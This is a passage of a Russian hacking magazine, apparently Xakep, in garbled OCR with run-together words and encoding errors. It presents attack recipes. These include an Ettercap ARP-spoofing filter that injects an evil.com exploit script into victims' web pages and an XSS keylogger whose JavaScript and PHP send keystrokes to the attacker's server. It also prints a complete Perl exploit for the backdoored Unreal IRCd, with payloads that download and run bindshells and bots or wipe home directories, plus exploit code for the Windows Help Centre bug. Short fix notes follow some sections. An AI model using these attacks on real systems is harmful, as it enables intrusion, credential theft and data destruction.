книги хакеры / журнал хакер / 139_Optimized

¹ 2 ЗАДАЧА: ОПРЕДЕЛИТЬИСПОЛЬЗОВА-

НИЕPHP ИЕГОВЕРСИЮНАУДАЛЕННОМ СЕРВЕРЕ.

РЕШЕНИЕ:

Ноестьдругойзабавныйспособ. Аименно— «пасхальныеяйца» от создателейPHP. ПричемониприменимыклюбымPHP-скриптам, дажесошибкамивстилеFatal Error. Пишемлюбойизпунктовклюбомускрипту:

Задачанетрудная, новнекоторыхслучаяхбываетнеобходима. К примеру, когданасерверахчастоюзаютmod_rewrite (еслиневтеме— оченьлаконичноописанонаВикипедиивстатье«ЧПУ_Интернет»). Зачемверсия? Кпримеру, самPHP имеетвнутренниеуязвимости, которымиможновоспользоваться. Вэтомможноубедиться, порыскав наexploit-db.com. Можнопосмотретьзаголовокотвеб-сервера, где нарядусегобаннеромможетбытьиинфаоPHP.

КорявыйзначокнаВК

скрипт.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 скрипт.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 скрипт.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 скрипт.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 скрипт.php?=SUHO8567F54-D428-14d2-A769-00DA302A5F18

Первый— забавнаякартинка, второй— логоPHP, потомлогоZEND, списокавторов, логоотSuhosin (добавкакPHP). ПричемотображениепервогопунктасильноменяетсявзависимостиотверсииPHP.

Соответствиеиописание«почемуонотак» можнонайтинаwww.0php. com/php_easter_egg.php.

Жаль, чтоотключаетсяэтафичатемже, чемидобавлениевответ серверазаголовкаоPHP, аименно— установкой«expose_php=off» в php.ini.

ЗабавныекартинкивPHP

ВЗЛОМ

//Ищем строку

if (search(DATA.data, "Accept-Encoding")) { //Заменяем на мусор

replace("Accept-Encoding", "Blabla-Blahblah"); //Мессага äëÿ íàñ

msg("Accept-Encoding field has been changed\n");

}

}

//Если протокол – TCP, исходящий порт – 80 if (ip.proto == TCP && tcp.src == 80) {

replace("</body>", " <script type=\"text/javascript\" src=\"http://evil.com/sploit.js\"></script> \" ");

// Меняем ответ сервера – HTML-страницу, подставляя какой-то свой сплойт

replace("</html >",

" <img src=\"http://evil.com/evil.gif\"></img>"); msg("Success!\n"); //Мессага для нас

}

ДлясозданияфильтровкEttercap существуетпримитивный«язык», которыммыивоспользовались. Здесьмысоздалидва«правила». Первоеприменяетсякпакетам, отправленнымна80 портпопротоколу TCP. Обычноэтозапросыбраузеранаоткрытиетойилиинойстраницы веб-серверу. Внихищемстрочку«Accept-Encoding» (полестандарт- ногоHTTP-заголовка, посылаемогобраузером) именяемееналюбой другойтексттогожеразмера(этоважно). Требуетсяэто, потомучто обычнов«Accept-Encoding» указывается, чтоответыотвеб-сервера можносжимать. Нопосжатымданныммынесможемпровестинеобхо- димоенамизменениеHTML-страниц. Поэтомумыменяемэтополена что-нибудьдругое. Сервержеприразборепропуститэтокривоеполе иответитнамвнесжатомвиде. Второеправилоприменяетсяужек принимаемымданным. Ситуацияпохожая. Делаемвыборкупакетовот веб-сервера(протоколTCP, исходящийпорт— 80). Именяемстрочки «</body>», «</html >» налибояваскриптовский, либорисунок-сплойт, несутьважно. Почемуименноэтитегибудемменять? Унихестьодин

плюс— ониприсутствуютпочтинавсехHTML-страничкахвединичном числе, чтоповыситшансынауспешнуюэксплуатациюуязвимостипри маломколичествезапросовкнашемусерваку. Новсезависитотситуации, браузеражертвыит.д. Ещепарамоментов: функция«replace» регистрозависима, тоестьможноповторитьискомыестрочкивразных регистрах, афункция«msg» выводитнамсообщениявлогах, чтобымы знали, когдаправилозадействовалось.

ДалеетребуетсяпереваритьнаштекстовыйфайлсфильтромвудобоваримыйдляEttercap’a вид. Пишемвконсоли:

etterfilter http_filter.txt -o http_filter.ef

Гдеhttp_filter.txt — нашфайлсфильтром, ав«-o http_filter.ef» указы-

ваемимябудущегоЕttercap-фильтра(необязательнаяопция).

ДалеезапускаемсамEttercap.

ettercap -T -F http_filter.ef -M ARP /192.168.0.1/

Гдеопция«-T» указываетнато, чтомызапускаемтекстовуюверсию

Ettercap; «-F http_filter.ef» — подключаемполученныйотEtterfilter

фильтр; «-M ARP /192.168.0.1/» — указываемEttercap, чтотребуется запуститьMitM атаку, аименно— arp-спуфинг(вEttercap входитеще несколькоклассическихатак). 192.168.0.1– IP шлюза. Кромевстроенности, бонусыиспользованиявстроенногоarp-спуффингаещеив том, чтопослесвоейработысниффервосстанавливаетARP таблицы, посылаяправильныезначения, ктомужененадозаморачиватьсяс редиректами. ВитогеEttercap будетфильтроватьтрафикотнашей жертвы, добавляявконецкаждойHTML’кинашсплойт. Какпонимаешь, Ettercap — тулзакрутая. Особенносвозможностямифильтров, а онишироки. Этоиизменение, декодированиепакетов, ииспользованиерегекспов, изапусккоманд... Основнуюинфуможнопочерпнуть изman’овиприлагаемыхкEttercap’упримеров. Кстати, еслибудешь разбиратьсясэтойтулзой, топомни, чтоонанесниффиттрафик, посылаемыймашиной, накоторойонаустановлена.

¹ 4 ЗАДАЧА: ОБЛЕГЧИТЬСБОР

ИНФОРМАЦИИ.

РЕШЕНИЕ:

Всвоихоколохакерскихилижитейскихделахмычастосталкиваемся снеобходимостьюпоискаинформации. Будьтосборинформациио каком-тосервереилипоискикакого-тоэксплойта(илипоискилюбви:)). Яуверен, чтокаждыйизнасимееткучкузакладоккосновнымресурсам дляэтого. Такжеестьвсевозможныеплагиныдляускоренияэтогодела. Новобоихслучаяхтыпривязываешьсякопределенномукомпьютеру/ софту(особеннокогдапользуешьсяразнымибраузерами). Есть, конечно, решенияэтойтрудности, но... Хочуподелитьсянаходкой, которая чрезвычайнопорадоваламеня— сервиснаhttp://yehg.net/q. Посути, этоагрегаторкучивсевозможныхпоисковых(инетолько) систем. Ввелчто-товстрокупоискаиснизуувиделвыборкусгугла, одинклик

— иужесвики. Ноэтонебылобынастолькоинтересно, еслибынедве вещи. Во-первых, yehg — этохакерскаягруппа, потомуисервисзаточен подзадачи, связанныесинформационнойбезопасностью. Поэтомутути поисковикипосплойтам, уязвимостям, ивсяческиеwhois’ыдапортсканеры, кодеры/декодерыит.д. Кстати, оченьсоветуюпросмотретьвесь наборсайтов. Подборкадействительнохороша, навсеслучаижизни, какговорится. Можночто-тодлясебявыделить, запомнить.

Второйжеплюсзаключаетсявтом, чтоэто— общедоступный«веб-аг- регатор» поисковиков(gosu.pl/wsa/). Оноченьпростой, таккакиспользуеттолькоJavaScript ифреймы. Тоестьможетработатьдажелокальнои непривязанкбраузеру.

Поэтомуегоможнобыстроилегконастроитьподсебя.

Длятого, чтобыдобавитькакой-топоисковик, требуетсявсеголишь вставитьстрочкувHTML’куагрегатора. Например, добавимпоискпо сайтужурнала. Ищемидобавляем:

CATS["General"] = {

…

Прикрученныйпоискпосайтуxakep.ru

"xakep": "http://www.xakep.ru/local/search/search. asp?text=%s",

…

};

Где%s — место, кудабудетвставлятьсятастрока, которуютыищешь. Витогевкатегории«General» унаспоявитсяпункт«xakep». Все просто. Причемможноввестидополнительныйтекстилипараметры кзапросу. Какэтосделано, например, впоискесплойтовпогуглу, где

добавляетсяквведенномузапросу«(vulnerability or vulnerabilities) OR (exploits or security holes)», ивитогенамнадовводитьтолько названиеПО.

Версия агрегатора, используемая YEHG, явно более продвинутая, чем от разработчика. Там есть и многострочное окошко для запроса, и возможность редактирования итогового запроса. К тому же по основным сайтам поиск уже организован. Хотя она и с «мусором» (реферы на группу), удалить его не составит труда. В общем, на диске приложена именно она.

¹ 5 ЗАДАЧА: УКРАСТЬЛОГИН, ПАРОЛЬ

ПОСРЕДСТВОМXSS ИКЕЙЛОГГЕРА.

РЕШЕНИЕ:

XSS бываютразные: активные, пассивные. Первые, конечно, болееопасны, таккакостаютсянасерваке, ноисовторымиможнокое-чтосваять. Чтооченьхорошодлянас— XSS-уязвимостичрезвычайнораспростра- нены. Этосвязаноисосложностямизащитыотних, ночтоважнее— с общимотношениемкним, дажеуспециалистоввобластиИБ. ВедьмногиенесчитаютXSS заюзабельнуюуязвимость! Давайпосмотрим. Как насчеткейлоггерачерезXSS? Примитивныйкейлоггерсостоитиздвух компонентов: самогоJavaScript’а, отвечающегозаперехватнажатийи отправкуданныхоних, нуисервера, которыйбудетприниматьисохранятьданные. Потомунамтребуетсялевый(можнобесплатный) сервакс поддержкой, например, PHP. JavaScript (кодсinsanesecurity.info):

var keys=''; //определяем переменную document.onkeypress = function(e) {

//перехватываем нажатия

get = window.event?event:e; //перехватываем событие key = get.keyCode?get.keyCode:get.charCode;

//получение кода нажатой кнопки

key = String.fromCharCode(key); //перевод кода в норм вид keys+=key; //кучкуем нажатия в строчку

}

window.setInterval(function(){

//отправляем данные через временные промежутки new Image().src = 'http://òâîé_õîñò:80/keylogger.

php?keys='+keys; //передаем данные скрипту keys = ''; //сбрасываем переменную

}, 1000);

Логикатакова: скриптперехватываетнажатияклавишисохраняетихв переменную, ачерезопределенныепромежуткивремениконнектитсяк нашемуPHP-скрипту, передаваяполученнуюпеременнуювзапросе.

ДалеезаливаемнасерверPHP-скрипт:

<?php

$log= $_SERVER["QUERY_STRING"]."\r\n"; //получаем данные от js

$fp=fopen("log.txt", "a"); //создаем файл на хостинге fputs($fp, $log); //заполняем его

fclose($fp); ?>

Взависимостиотситуации, пихаемлибосамкод, либоссылкунанего черезXSS насерверилипользователю. Теперьвсенажатияклавиш пользователянастраницеснашимяваскриптомбудутсохраненына нашемсервере.

Ноэтобылскореепоказательныйпример.

Качественныйяваскрипт-кейлоггертыможешьвзятьсsourceforge.

net/projects/jskeylogger/ (либонадиске). Версия1.4. Сутьздесьтаже—

скриптисервер. Нореализациягораздолучше: присохранениилога отмечаетсяполе, вкотороевводилисьданныеиуникальныйID ввода данных, такчтоспарсингомнетвообщеникакихпроблем. Несколько странно, чтосерверздесьреализованввидеexe’шниканапитоне. Но переноснаPHP, например, проблемвызватьнедолжен. Вархиветакже прилагаетсяпарапримеров, всеоченьпоказательно. Одинсущественныйминусданногологгера— нетподдержкирусскогоязыка. Ноее, я думаю, нетруднобудетприкрутить. Использованиекейлоггераневсегда возможноиневсегдаоправдано. Новопределенныхслучаяхмыможем получитьбольшиебонусы, чем, например, отклассическойкражикукисов, таккакданныемыполучаемнеизмененные, незашифрованные. Так чтостоитьпомнитьотакойштуке.z

ВЗЛОМ

Алексей Синцов, Digital Security a.sintsov@dsec.ru

01ВЫПОЛНЕНИЕПРОИЗВОЛЬНОГО КОДАЧЕРЕЗБЭКДОРВUNREAL IRCD

CVE

CVE-2010-2075

TARGETS

• Unreal IRCD v. 3.2.8.1

BRIEF

НачнемсегодняшнийобзорспроблемывизвестномIRC-демоне— Unreal IRCD. Да, ещенетакдавноIRC былодлянасвсехважнейшим каналомобщения. ВтевременаещенесуществовалниFacebook, ни Twitter, илюдиохотнообменивалисьбайтамивконсольномрежиме. С техпорутеклонетакмноговоды, ипоэтомуIRC — по-прежнемуполно- ценныйипопулярныйсервис.

Итемобиднее/веселее(нужноеподчеркнуть), чтонекиезлодеи, видимо, фанатыWEB 2.0, желающиезахватитьмир, внедрилибэкдор (BackDoor — черныйвход) висходныекодыдистрибутиваUnreal IRCD. «Затрояненная» версияIRC-демоналежаланазеркальныхсерверах ажсноября2009 годапоиюньнынешнегогода. Надополагать, что заэтовремямножестводобрыхичестныхлюдейуспелиустановить данноеПО. Этотфактбылобнаруженсоздателямидемона, очемони сомножествомизвиненийидонеслидоширокойобщественности.

EXPLOIT

Широкаяобщественностьпожелаласоздатьэксплойт, который используетбэкдорвUnreal IRCD, длясвоихкорыстныхцелей. Дажев составMetasploit’адобавилисоответствующиймодуль. Посмотрим, чтожепредставляетсобойэтотбэкдор. Какоказалось, самбэкдор— эточетырестрочкивисходныхкодах, первымделом былидобавленыдвестрочкивмодульs_bsc.c, вфункциюread_ packet(). Этафункциячитаетиобрабатываетвсевходящиепакеты. Считанныеданныепомещаютсявпеременнуюreadbuf. Сразупосле того, какданныебылисчитаныизсокета, вделовступаютсилызла, а вернее, двестрочки, внедренныевэтумилуюфункциюзлоумышленниками:

#ifdef DEBUGMODE3

if (!memcmp(readbuf, DEBUGMODE3_INFO, 2))

DEBUG3_LOG(readbuf); #endif

Тутидетсравнениепервыхдвухбайтсчитанныхданныхснекими статическимибайтами, определеннымизаDEBUGMODE3_INFO (если определенDEBUGMODE3). Еслибайтысовпадают, тодалеесчитанные данныепереходятвDEBUG3_LOG(). Чтожеэтозаопределения? Аэто насамомделемакросы, добавленныевфайлstruct.h.

#define DEBUGMODE3 ((x)->flags & FLAGS_NOFAKELAG)

. . .

#ifdef DEBUGMODE3

#define DEBUGMODE3_INFO "AB"

#define DEBUG3_LOG(x) DEBUG3_DOLOG_SYSTEM (x)

. . .

#define DEBUG3_DOLOG_SYSTEM(x) system(x)

Резюмируюувиденное: присчитываниикаждоговходящегопакета бэкдорсравниваетпервыедвабайтаданныхспоследовательностью «AB». Еслисовпадениеесть, тосодержимоеданныхпередаетсявызовуsystem(), тоестьнаисполнениевоперационку.

Эксплойт:

#!/usr/bin/perl

#Unreal3.2.8.1 Remote Downloader/Execute Trojan

#DO NOT DISTRIBUTE -PRIVATE-

#-iHaq (2l8)

use Socket;

use IO::Socket;

## Payload options

#Различные «нагрузки». По сути команды — это любые

#команды для оболочки unix/linux, начинающиеся с «AB;».

#Первые два байта гарантируют, что бэкдор передаст

#все в system(); - чтобы выполнилась без проблем

#остальная часть данных.

my $payload1 = 'AB; cd /tmp; wget http://

BlazeDVD. «Обработчик» восстанавливаетстекдляработыROP

packetstormsecurity.org/groups/synnergy/bindshellunix -O bindshell; chmod +x bindshell; ./bindshell &'; my $payload2 = 'AB; cd /tmp; wget http://efnetbs.webs. com/bot.txt -O bot; chmod +x bot; ./bot &';

my $payload3 = 'AB; cd /tmp; wget http://efnetbs.webs. com/r.txt -O rshell; chmod +x rshell; ./rshell &';

my $payload4 = 'AB; killall ircd';

my $payload5 = 'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr *';

$host = ""; $port = ""; $type = "";

$host = @ARGV[0]; $port = @ARGV[1]; $type = @ARGV[2];

if ($host eq "") { usage(); } if ($port eq "") { usage(); } if ($type eq "") { usage(); }

sub usage {

printf "\nUsage :\n";

printf "perl unrealpwn.pl <host> <port> <type>\n\n"; printf "Command list :\n";

printf "[1] - Perl Bindshell\n"; printf "[2] - Perl Reverse Shell\n"; printf "[3] - Perl Bot\n";

printf "-----------------------------\n"; printf "[4] - shutdown ircserver\n"; printf "[5] - delete ircserver\n"; exit(1);

}

sub unreal_trojan { my $ircserv = $host; my $ircport = $port;

# инициируем соединение

my $sockd = IO::Socket::INET->new (PeerAddr => $ircserv, PeerPort => $ircport, Proto => "tcp") || die "Failed to connect to $ircserv on $ircport ...\n\n";

print "[+] Payload sent ...\n";

# отсылка злого контента if ($type eq "1") {

print $sockd "$payload1";

}elsif ($type eq "2") { print $sockd "$payload2";

}elsif ($type eq "3") { print $sockd "$payload3";

}elsif ($type eq "4") { print $sockd "$payload4";

}elsif ($type eq "5") { print $sockd "$payload5";

}else {

printf "\nInvalid Option ...\n\n"; usage();

}

close($sockd); exit(1);

}

unreal_trojan();

# EOF

SOLUTION

Проверитьисходныекоды, изкоторыхсобрандемон, наналичие шеститроянскихстрокили, чтобудетпроще, проверитьMD5-хеш архива. Узатрояненойверсиихешдолженбыть752e46f2d873c1679fa9 9de3f52a274d, унормальнойверсии— 7b741e94e867c0a7370553fd015 06c66. Есличтонетак— удалитьстрокиипересобратьIRC-демонили скачатьсофициальногосайта(иопять-такипроверитьхеш, навсякий пожарный).

02ПЕРЕПОЛНЕНИЕБУФЕРА ВBLAZEDVD PLAYER

CVE

N/A

TARGETS

• BlazeDVD Player 5.1

BRIEF

Обуязвимостивэтомплеереизвестноужедостаточнодавно, темне менееябыхотелобратитьвниманиенасвежийэксплойтподданную уязвимость. Деловтом, чтоэксплойтработаетвсредеWindows 7, а значит, умеетобходитьDEP иASLR. Авторэксплойта— баг-хантер, известныйвСетиподникомmr_me, вдевичестве— СтивенСилей(Steven Seeley). Пареньэтотразвлекаетсятем, чтоищетдырыв различномПОипишетадекватные, рабочиеэксплойты, зачточесть емуихвала(блогтоварища— https://net-ninja.net). Хочуотметить, чтосостоитонвкомандеCorelan Security Team, создателькоторой,

ВЗЛОМ

Acrobat Reader. Эксплойтсработалкакчасы. SWF-файлвнутриPDF

corelanc0d3r, выпустилнедавносвой10-йтуториалотом, какписать современныеэксплойты, используятехникувозвратно-ориенти- рованногопрограммирования. Неудивительно, чтоиэтотэксплойт основаннатойжеидее.

EXPLOIT

Данныйэксплойтсоздаетфайлплейлистаcst-blazedvd.plf, приоткрытиикоторогоспомощьюBlazeDVD Player выполнитсяфирменный шеллкод— вызовMessageBoxA ссообщениемотом, что«хак» удался :). ТрудноститакогоэксплойтавWindows 7 две. Во-первых, память, гдележитунасшеллкод(алежитонвстеке) являетсянеисполняемой, поэтомушеллкоднеимеетникакогоморальногоправавыполниться. Втораяпроблема— адресфункцииMessageBox намнеизвестен, так каквсесистемныебиблиотекивWindows 7 имеютслучайныйсдвиг относительногобазовогоадреса. Такимобразом, послеперехвата управления(аименно— перезаписиSEH встеке), эксплойтдолжен как-тосделатьстекисполняемым, например, спомощьювызова функцииVirtualProtect, аещедолженкак-тоопределитьадреса используемыхфункций(VirtualProtect/MessageBox). Еслитычитал предыдущиеномера, товкурсе, чтотакоеROP, исчемегоедят. Если нет, тонапомню— послезавершенияработыуязвимаяфункцияберет изстекапереписанныйнамиадресвозврата. Этотадресуказываетна некийучастокисполняемойпамятиснекиминужнымиинструкциями, обычноиходна-двештуки. Этинужныеинструкциивидеаледолжны заканчиватьсякомандойRETN, котораяберетследующийадресиз стека, которыйтакжевтиснуттудаприпереполнениибуфера. Таким вотпутемвыполняетсякод, какбыизкусочковчужогокода. mr_me правильнозаметил, чтоеслибратьтакойкодизбиблиотексамогоплеера, тодаженесмотрянаналичиеASLR кодвсегдабудетнаходиться поодномуитомужеадресу. Деловтом, чтоплеерскомпилированбез поддержкиASLR, ипоэтомувсеегомодуливсегдагрузятсяпоодному

итомужеадресу(соследующегономераяуженебудуподробнорасписыватьROP, иначеForb менязагрызетзатратуценнойбумагина такуюизбитуютему(иправильносделает— прим. ред.)). НетривиальнойбылаизадачазаставитьэтотROP работать. Ведьвчемштука: во времяобработкиSEH блокастексодержитлишьадресанаобработчик

иследующийблок. ВсеостальноевстекедалекоотROP программы. mr_me нашелвстатичныхмодуляхадрессменызначениявершины стека. Тогдапроцессорпереходитпоэтомуадресу(думая, чтотам обработчик) ивыполняетизменениеуказателянавершинустека:

0x616074AE : ADD ESP, 408

0x616074B4 : RETN 4

; РОП восстановлен, берем адрес и двигаем по цепочке

Такимобразом, ROP-программаисполняетсядальше, таккакRETN 4 беретизужеизменившегосястеказначения, подсунутыеmr_me. БолееподробнооработеROP можешьпрочитатьвмоейстатье,

BlazeDVD. Результатоткрытияплейлиста

посвященнойразработкеэксплойта(которыйужеуспелстатьклассическим... черт, себянепохвалишь, никтоже...) сиспользованием возвратно-ориентированногопрограммирования. Все. БольшеоROP неговорю. Нуи, конечно, эксплойтскомментариямиищинадиске.

SOLUTION

Чтоделатьпользователям, понятноедело— обновитьплеер. Авот программистамнадобыбытьаккуратнее. Учитываято, чтоотошибок никтонезастрахован, особеннонестоитпренебрегать/dinamicbase / GS-флагамиприкомпиляции. Иеще— всвязкесSehOP всеэтодобро позволитперестраховатьсяисохранитьчесть, таккактакойтандем практическинепробиваем.

03 ОШИБОЧНАЯОБРАБОТКА УКАЗАТЕЛЯВFLASH PLAYER

CVE

CVE-2010-1297

TARGETS

•Adobe Acrobat Reader < 9.4

•Adobe Flash Player < 10.1

BRIEF

Вочереднойразмирпоразила0day-угрозадлялюбителейпродукции Adobe. Акудадеваться? ТемнаясторонаСилынашлауязвимостьв обработкебайткодаSWF Flash. Чтопримечательно, эксплойт, разработанныйтьмой, былзаточениподAcrobat Reader. Фичавтом, что читалкаподдерживаетвоспроизведениефлеш-анимации, аотсюдаи последствия— атакасразунадвапродукта. ЭксплойтэтотбылразреверсенидобавленвMetasploit. Такчтодобропожаловать...

EXPLOIT

Пытаясьразобратьсявтом, откудапришлапроблема, исследователи обратиливниманиенато, чтоSWF-файл, которыйиспользовалсядля эксплуатацииуязвимостиизаражениябедныхюзеров, былпракти- ческиидентиченфайлуAES-PHP.swf, которыйестьвсвободномдоступевСети. Собственно, отличиебылолишьводномбайте, аименно

— воригинальномфайлебайт-код0x66 (GetProperty) замененна

Acrobat Reader. Содержимоеheap-spray

байт-код0x40 (newfunction). Скореевсего, обнаружитьэтууязвимость помогфайловыйфаззер.

Передтем, каксработаетSWF-файл, вPDF происходитheap-spray с помощьюJavaScript. Вкучесоздаетсямножествостраницсшеллкодом, нонетолько. Длятого, чтобыобойтизащитуDEP, вкучутакже инжектитсяROP-программа, которая спомощьюсистемноговызова создаетновыйкусокисполняемойпамятиикопируеттудашеллкод. Самоеинтересное— этокакROP-программаизсгенерированнойкучи попалавстек. Уязвимость(вставкабайт-кодаnewfunction) приводитк возможностиперезаписиуказателяECX значением0x0C0C0C0C, послечегопроисходитвызовcall [ecx+0c]. Научнодоказано, чтопоэтому адресуобычнобываютданныеизheap-spray. Злостныйхакертак рассчиталразмеринжектируемыхданных, чтопоадресу0x0C0C0C0C + 0xC находитсязначение: 0x700156f. Тоестьфактическипроисходит вызовcall 0x700156f. ЭтотадреспринадлежитBIB.dll исодержиттакой воткод:

mov eax,[ecx+0x34]

;ECX все еще указывает на heap-spray (0x0C0C0C0C)

;по адресу 0x0C0C0C0C+0x34 лежит значение 0x0C0C0C0C

;что и заносится в EAX

push [ecx+0x24] call [eax+8]

;по адресу 0x0C0C0C0C+0x8 лежит 0x70048ef

0x70048ef — адресизтойжебиблиотеки, исодержитследующийкод:

Воттакимобразомуказательнастексталуказателемнакучуизheapspray. Далееприведусодержимоекучиспошаговойнумерацией действий(всезначенияравны4 байтам, первоезначениевкуче— по адресу0x0C0C0C0C).

0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret ;(øàã 3)

0xcccccccc,

0x70048ef, # xchg eax,esp / ret ;(øàã 2)

Каквидно, техникувозвратно-ориентированногопрограммирова- нияможноиспользоватьибезинструкцийRETN. Можновыбирать инструкциидоинструкцииCALL илиJMP, еслиможноконтролировать регистры-указатели.

SOLUTION

Flash 10.1 несодержитэтойуязвимости, такчтопатч-менеджмент— полезноедело. Крометого, библиотекаBIB.dll, котораяиспользуется эксплойтом, какдоноринструкций, поддерживаетASLR, апосему владельцыWindows 7 могутспатьспокойно— эксплойтнесработает наихсистемах.

04ВЫПОЛНЕНИЕПРОИЗВОЛЬНОГО КОДАВWINDOWS HELP CENTRE

CVE

CVE-2010-1885

TARGETS

•Windows XP

BRIEF

Как известно, существуют разные взгляды на политику разглашения информации об уязвимости. Господин Тэвис Орманди (Tavis Ormandy), уже не раз бывавший героем рубрики, например, придерживается взгляда о полном разглашении, если разработчик не проявил должного рвения к разработке патча. Два месяца назад он опубликовал 0day в JAVA Deployment Tool Kit, а в этот раз замахнулся на святое — на Windows XP, вернее, на его подсистему помощи. Он показал миру, как легко может быть запущен любой файл в системе, достаточно лишь жертве перейти на специально сформированную страницу. Тэвис сообщил Microsoft'у о проблемах, но, по его словам, без эксплойта его послали подальше. Спустя несколько дней Тэвис сделал эксплойт, но также сделал и публичный релиз информации об уязвимости с техническими деталями и примером эксплойта. Вскоре после этого темная сторона Силы начала использовать этот эксплойт для атаки на пользователей. В итоге Microsoft написала гневное письмо-сообщение о том, что Google — это зло. «Э, причем тут они?» — спросишь ты. Да дело в том, что Тэвис является работником именно этой компании, где занимается разного рода security-research’ем. Но вот Google тут

ВЗЛОМ

Windows Help Center. Эксплойтработаетчерезлюбойбраузер.

ни при чем; по словам Тэвиса, он делал все этот независимо от работы, в свое свободное время и ради собственного удовольствия. Комьюнити начала делится на два лагеря. Лидер Immunity написал письмо, о том, что Тэвис, конечно, поспешил, но спускать собак на него не надо. Разработчики и так живут в шоколаде — ресерчеры бесплатно ищут уязвимости, сообщают детали и ждут... иногда ждут год, иногда больше. С другой стороны, такой подход плодит заразу

ибыл сравнен одним товарищем с кибертерроризмом. Мда. Есть

итретья сторона — NO MORE FREE BUGS. Другими словами, если разработчику нужна информация об уязвимостях — пусть платит

ипотом делает, что хочет. Некоторые разработчики уже пошли по такому пути...

EXPLOIT

ЦентрПомощииПоддержки— этоПО(helpctr.exe), котороепоумолчаниюимеетсяввинде, ономожетобрабатыватьURL надокументы, которыеначинаютсясоспециальногопрефикса«hcp://». Далееидет проверка, естьлиданныйдокументвспискедоверенных. Вот, собственно, Тэвисинашелпуть, которыйпозволяетобманутьэтупроверку. Вернее, оннашелXSS втакомдокументе.

hcp://system/sysinfo/sysinfomain.htm?svr=<h1>test</

h1>

Документыэтинаходятсявпривилегированнойзоне, иТэвиснашел путьисполнитьпроизвольныйкод: : <script

defer>eval(unescape ('Run("calc.exe")'))</script>. Однакоиз-зафильтраIE8

такпользователяневзломать. Ивоттутнашхитрецизловчился— он воспользовалсяWindows Media Player... Да, да... деловтом, чтоэтот плеерможетлегковызыватьсяизбраузера, например, спомощьюего ActiveX. УплеераестьвозможностьходитьзавсякимданнымипоURL, поэтому, подготовивнебольшойASX-скрипт, можноуказатьплееру, чтопоказывать, икуда, собственно, емуидти:

<ASX VERSION="3.0"> <PARAM name="HTMLView"

value="http://ZLOI-URL/starthelp.html"/> <ENTRY>

<REF href="http://ZLOI-URL/bug-vs-feature.jpg"/> </ENTRY>

</ASX>

Этогодостаточно, чтобыприоткрытииплееромонпошелпоэтим линкам. REF указываетнакартинку, которуюгордопокажетнаэкране, авотPARAM name="HTMLView" поведетплеерзадополнительными данными— starthelp.html:

<iframe src="hcp://services/search?query=anything& topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain. htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape% 28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/ script%3E">

ТутТэвисиспользуетхитруюуязвимостьобработкиспецсимволовв центрепомощи, чтобыобойтипроверкунадоверенность. Деловтом, чтофункциянеоченьхорошопереводитизhex'оввчислаприраскоди- ровкеunescape-строки, поэтомуврезультатемыувидимкалькулятор. Болеетого, сIE7 можнонепаритьсяиз-зафильтраисразутакидавать фреймомпо... центрупомощи. ОднаковариантсMedia Player'омможно использоватьидлякросс-браузерныхатак, чтоТэвисипоказал:

<html><head><title>Testing HCP</title></head> <body><h1>OK</h1>

<script>

//HCP:// Vulnerability, Tavis Ormandy, June 2010. var asx = "http://ZLOI-URL/simple.asx"; // для плеера

//Если IE, то грузим активикс и передаем ему asx.

if (window.navigator.appName

== "Microsoft Internet Explorer") { // Internet Explorer

var o = document.createElement("OBJECT"); o.setAttribute("classid",

"clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6"); o.openPlayer(asx); //ÁÀÕ!

//Если не IE, то открываем asx в фрейме,

//крутые браузеры сами поймут, что нужен //медиа плеер для этого...

}else {

//Mozilla, Chrome, Etc.

var o = document.createElement("IFRAME"); o.setAttribute("src", asx); document.body.appendChild(o); //ÁÀÕ!

}

</script>

</body></html>

Добавлю, чтоплеермерзкопредупреждаетотом, чтоемунадозачем- тосходитьнаZLOI-URL.

SOLUTION

•Отключитьпротоколhcp (удаливHKCR\HCP\shell\open) центр помощи.

•ВоспользоватьсяпатчемотТэвиса— http://lock.cmpxchg8b.com/ b10a58b75029f79b5f93f4add3ddf992/hcphotfix.zip. Этотпатчфиксит бинарникhelpctr.exe, делаяпроверкунадежной.

•ЖдатьпатчаотMicrosoft. z